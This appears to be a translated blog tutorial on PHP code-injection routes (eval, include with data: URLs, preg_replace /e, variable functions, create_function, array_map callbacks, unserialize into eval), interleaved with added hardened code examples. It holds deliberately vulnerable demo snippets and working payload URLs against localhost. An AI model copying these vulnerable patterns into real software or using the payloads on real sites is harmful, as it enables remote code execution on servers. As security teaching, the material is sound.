Month of PHP Security is a feast for PHP security enthusiasts. I read a lot of the PHP security articles and shared them; their authors are all idols of mine.
From: http://hi.baidu.com/menzhi007

1. Code execution functions
Functions that can execute code in PHP, such as eval(), assert(), the backtick operator (``), system(), exec(), shell_exec(), passthru(), escapeshellcmd(), pcntl_exec(), and so on.
DEMO code 1.1:
<?php
echo `dir`;
?>

2. File inclusion code injection
Code injection through the file inclusion functions under specific conditions, namely include(), include_once(), require(), and require_once().
When allow_url_include = On and the PHP version is >= 5.2.0, code injection is possible.
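A hardened counterpart to include() with a request-controlled page name, added here as an example and not part of the original post. It assumes a hypothetical pages/ directory next to the script and a constructed allowlist of page names; the request parameter a is reused from the demo in this section.

```php
<?php
// Added example (not from the original post): a user-supplied page name is
// resolved against a fixed allowlist instead of being passed to include().
// Assumed layout (hypothetical): page templates live in __DIR__ . '/pages/'.

declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';

/**
 * Map a request parameter to a file path that is safe to include.
 * Returns null when the request does not name an allowed page.
 */
function resolvePage(string $requested): ?string
{
    // Only short alphanumeric names are considered at all; this rejects stream
    // wrappers ("data:", "php://"), "../" sequences and absolute paths outright.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $requested)) {
        return null;
    }

    $allowed = ['home', 'about', 'contact'];          // constructed allowlist
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // Defence in depth: the resolved file must still sit inside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = resolvePage((string) ($_GET['a'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('unknown page');
}
include $page;
```

The allowlist is the actual control: the data: wrapper from the demo, path traversal and remote URLs all fail the first two checks before any filesystem access. Keeping allow_url_include = Off (its default) in php.ini and the realpath() containment check are additional layers, not substitutes.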
DEMO code 2.1:
<?php
include($_GET['a']);
?>
Accessing http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E runs phpinfo().

3. Regular expression matching code injection
Code injection caused by the well-known preg_replace() function: when the /e pattern modifier is present in the pattern, the replacement string is executed as PHP code. We discuss this in three cases.
3.1 preg_replace() pattern parameter injection
Code injection through the pattern, the first parameter. When magic_quotes_gpc = Off, the injected code is executed.
DEMO code 3.1:
<?php
echo $regexp = $_GET['reg'];
$var = '<php>phpinfo()</php>';
preg_replace("/<php>(.*?)$regexp", '\1', $var);
?>
Accessing http://127.0.0.1/preg_replace1.php?reg=%3C\/php%3E/e runs phpinfo().
3.2 preg_replace() replacement parameter injection
Code injection through the replacement, the second parameter, which results in code execution.
DEMO code 3.2:
<?php
preg_replace("/menzhi007/e", $_GET['h'], "jutst test");
?>
Submitting http://127.0.0.1/preg_replace2.php?h=phpinfo() runs phpinfo().
3.3 preg_replace() subject parameter injection
Here we construct the subject, the third parameter, to execute code. Submitting http://127.0.0.1/preg_replace3.php?h=[php]phpinfo()[/php] or http://127.0.0.1/preg_replace3.php?h=[php]${phpinfo%28%29}[/php] causes code execution.
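A hardened counterpart for the three preg_replace() cases of this section, added here as an example and not part of the original post. The function names are assumptions; the inputs at the bottom are constructed to mirror the payloads shown in this section so that the safe versions can be seen handling them as plain text.

```php
<?php
// Added example (not from the original post). The three preg_replace() /e
// cases in this section have one fix: never let the regex engine eval a
// string. Keep pattern and replacement as literals, run user text that must
// appear in a pattern through preg_quote(), and use preg_replace_callback()
// with a fixed closure where the replacement has to compute something.
// PHP 7.0 removed /e entirely; preg_replace() then warns and returns null.

declare(strict_types=1);

/**
 * Counterpart of case 3.1: user text inside a pattern goes through
 * preg_quote(), so "/" cannot close the pattern and "e" cannot become a
 * modifier. The delimiter is passed so it is escaped as well.
 */
function containsLiteral(string $needle, string $haystack): bool
{
    return preg_match('/' . preg_quote($needle, '/') . '/', $haystack) === 1;
}

/**
 * Counterpart of case 3.2: the replacement is a literal backreference and
 * there is no /e, so whatever the user sent is only ever copied as text.
 */
function extractPhpTag(string $userSubject): string
{
    $out = preg_replace('/<php>(.*?)<\/php>/s', '[$1]', $userSubject);
    return $out ?? '';   // null signals a PCRE error (e.g. backtrack limit)
}

/**
 * Counterpart of case 3.3: [php]...[/php] blocks are rendered as escaped
 * code spans by a PHP closure; the captured group is data, never code.
 */
function renderCodeTags(string $subject): string
{
    $out = preg_replace_callback(
        '/\s*\[php\](.+?)\[\/php\]\s*/is',
        static function (array $m): string {
            return '<code>' . htmlspecialchars($m[1], ENT_QUOTES, 'UTF-8') . '</code>';
        },
        $subject
    );
    return $out ?? '';
}

// Constructed inputs mirroring the payloads shown in this section.
var_dump(containsLiteral('</php>/e', '<php>phpinfo()</php>/e'));
echo extractPhpTag('<php>phpinfo()</php>'), PHP_EOL;
echo renderCodeTags('[php]phpinfo()[/php]'), PHP_EOL;
echo renderCodeTags('[php]${phpinfo()}[/php]'), PHP_EOL;
```

The point of the third function is that the closure is ordinary PHP with its own signature and scope: the match is handed to it as an array, and nothing in the subject can change what the closure does.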
DEMO code 3.3:
<?php
preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", '\1', $_GET['h']);
?>

4. Dynamic code execution
4.1 Variable function code execution
DEMO code 4.1:
<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>
Submitting http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig executes the ipconfig command.
4.2 Dynamic function code execution
DEMO code 4.2:
<?php
$foobar = $_GET['foobar'];
$dyn_func = create_function('$foobar', "echo $foobar;");
$dyn_func('');
?>
Submitting http://127.0.0.1/create_function.php?foobar=system%28dir%29 runs the dir command.

5. Others
5.1 Code execution via the ob_start() function
DEMO code 5.1:
<?php
$foobar = 'system';
ob_start($foobar);
echo 'dir';
ob_end_flush();
?>
5.2 Code execution via the array_map() function
DEMO code 5.2:
<?php
$evil_callback = $_GET['callback'];
$some_array = array(0, 1, 2, 3);
$new_array = array_map($evil_callback, $some_array);
?>
Submitting http://127.0.0.1/array_map.php?callback=phpinfo executes phpinfo().
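Demos 4.1, 4.2, 5.1 and 5.2 share one root cause, a request value used as code or as a callable, so one defensive example serves all four. It is added here and is not part of the original post; the operation names, the request parameter callback and the closures are constructed for the illustration.

```php
<?php
// Added example (not from the original post). Demos 4.1, 4.2, 5.1 and 5.2 all
// let a request value reach a function that treats it as code or as a callable.
// The defence is the same for each: the request may choose an operation by name,
// but that name is only a key into a fixed map of closures written in the
// source. Nothing the client sends is passed to a variable function,
// create_function() (deprecated in PHP 7.2, removed in 8.0), ob_start() or
// array_map() as the callable itself. Parameter names are hypothetical.

declare(strict_types=1);

/** The fixed table of operations a request is allowed to select. */
function operationTable(): array
{
    return [
        'upper'   => static function (string $s): string { return strtoupper($s); },
        'reverse' => static function (string $s): string { return strrev($s); },
        'length'  => static function (string $s): string { return (string) strlen($s); },
    ];
}

/**
 * Counterpart of demos 4.1, 4.2 and 5.2: apply the selected operation to every
 * element and reject unknown names instead of calling whatever was sent.
 */
function applyOperation(string $name, array $values): array
{
    $table = operationTable();
    if (!array_key_exists($name, $table)) {
        throw new InvalidArgumentException('unknown operation: ' . $name);
    }
    return array_map($table[$name], $values);
}

// Constructed request values standing in for $_GET['callback'] / $_GET['argument'].
$name   = (string) ($_GET['callback'] ?? 'upper');
$values = ['alpha', 'beta'];

try {
    print_r(applyOperation($name, $values));
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo $e->getMessage(), PHP_EOL;
}

// Counterpart of demo 5.1: ob_start() receives a closure defined here, never a
// name taken from input; the handler uppercases the buffer as it is flushed.
ob_start(static function (string $buffer): string { return strtoupper($buffer); });
echo 'buffered text', PHP_EOL;
ob_end_flush();
```

A request of callback=phpinfo or callback=system now ends in the InvalidArgumentException branch, because is_callable() is never consulted: the only callables in play are the three closures in operationTable().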
5.3 unserialize() and eval()
unserialize() is a heavily used PHP function, and improper use of unserialize() can create security risks.
(See Black Brother's challenge 2: http://hi.baidu.com/hi_heige/blo... 5b18f499250a9b.html)
DEMO code 5.3:
<?php
class Example {
    var $var = '';
    function __destruct() {
        eval($this->var);
    }
}
unserialize($_GET['saved_code']);
?>
Submitting http://127.0.0.1/unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} executes phpinfo().
5.4 Functions that can easily cause security problems
There are many functions of the same type:
array_map()
usort(), uasort(), uksort()
array_filter()
array_reduce()
array_diff_uassoc(), array_diff_ukey()
array_udiff(), array_udiff_assoc(), array_udiff_uassoc()
array_intersect_assoc(), array_intersect_uassoc()
array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()
array_walk(), array_walk_recursive()
xml_set_character_data_handler()
xml_set_default_handler()
xml_set_element_handler()
xml_set_end_namespace_decl_handler()
xml_set_external_entity_ref_handler()
xml_set_notation_decl_handler()
xml_set_processing_instruction_handler()
xml_set_start_namespace_decl_handler()
xml_set_unparsed_entity_decl_handler()
stream_filter_register()
set_error_handler()
register_shutdown_function()
register_tick_function()